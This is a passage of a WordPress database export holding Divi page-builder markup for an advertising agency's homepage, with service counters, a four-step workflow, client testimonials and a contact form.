bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Amit\" title_text=\"Client Testimonial digital\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”\n[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 19:59:53','2020-08-08 19:59:53','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(698,1,'2020-08-08 20:00:49','2020-08-08 20:00:49','Client Testimonial graphic design','Client Testimonial graphic design','','inherit','open','closed','','artboard-2-2','','','2020-08-08 20:01:34','2020-08-08 20:01:34','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png',0,'attachment','image/png',0),(699,1,'2020-08-08 20:01:44','2020-08-08 20:01:44','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" 